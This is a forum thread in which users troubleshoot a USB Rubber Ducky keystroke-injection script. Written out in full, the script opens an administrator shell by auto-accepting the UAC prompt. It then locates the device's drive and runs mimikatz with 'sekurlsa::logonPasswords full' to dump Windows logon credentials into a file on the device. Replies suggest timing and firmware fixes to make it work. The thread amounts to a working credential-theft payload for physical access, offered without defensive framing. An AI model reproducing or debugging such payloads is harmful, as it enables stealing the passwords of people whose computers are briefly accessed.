Mazer22 Posted August 16, 2014 Share Posted August 16, 2014 So I found a script I wanted to run on the rubber ducky but when I run it the first line in cmd does not get entered. It just moves onto the next line without finding what drive it is in. When I had type the same line into cmd it works fine. I think it may be becasue the ducky isnt hitting ENTER or something. Anyone know what is going wrong here. Ill post a picture, the top is when the rubber ducky runs it and the bottom is hand typing it in. This is what I was trying to run: STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d DELAY 500 ENTER ????? Quote Link to comment Share on other sites More sharing options...
no42 Posted August 17, 2014 Share Posted August 17, 2014 You either need to flash the composite ducky firmware d_duck_vX.X.hex, where X is an integer. And label the sdcard as "DUCKY" Or insert a flash-drive labled "DUCKY"; Check out the links in my signature.... Quote Link to comment Share on other sites More sharing options...
Mazer22 Posted August 17, 2014 Author Share Posted August 17, 2014 Hey thanks for the response im really new at this so I appreciate the help. I flashed it with the composite_duck_S003.hex because I wanted it to be HID and mass storage. I didnt change anything but this morning it seems to be entering that line and I have a new problem haha. Ill put another picture in. After it sets the drive it just enters d.Heres what im usingDELAY 2000WINDOWS rDELAY 200STRING powershell Start-Process cmd.exe -Verb runAsENTERDELAY 2000ALT yDELAY 500STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "Ducky"') do set duck=%dENTERDELAY 500STRING %duck%\mimikatz.exe > %duck%\%computername%-passwords.txtENTERDELAY 100STRING priviledge::debugENTERSTRING sekurlsa::logonPasswords fullENTER Quote Link to comment Share on other sites More sharing options...
no42 Posted August 17, 2014 Share Posted August 17, 2014 try breaking up the strings DELAY 500 STRING %duck%\mimikatz.exe > %duck%\%computername%-passwords.txt ENTER DELAY 100 STRING priviledge::debug ENTER with additional delays? eg STRING %duck% DELAY 50 STRING \mimikatz.exe DELAY 50 STRING > %duck% Quote Link to comment Share on other sites More sharing options...
Mazer22 Posted August 18, 2014 Author Share Posted August 18, 2014 I dont know what to do. I broke up the strings like you suggested and now it cannot find the path to mimikatz im assuming. Mimikatz is on the sd card and opens fine so im guessing theres a problem with %duck% and it not finding the ducky? Quote Link to comment Share on other sites More sharing options...
MB60893 Posted September 6, 2014 Share Posted September 6, 2014 Have a look at the duck slurp post. This detects when the USB Flash Drive is plugged in. Also, look into Powershell, NOT cmd. Much better for the ducky. Quote Link to comment Share on other sites More sharing options...
EdDevSan Posted September 30, 2014 Share Posted September 30, 2014 I have a similar problem, I am from Mexico, when I plug my rubber ducky It start typing every where, on windows at first try to open a powershell and then start typing every where, on a browser, opens and closes windows etc. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.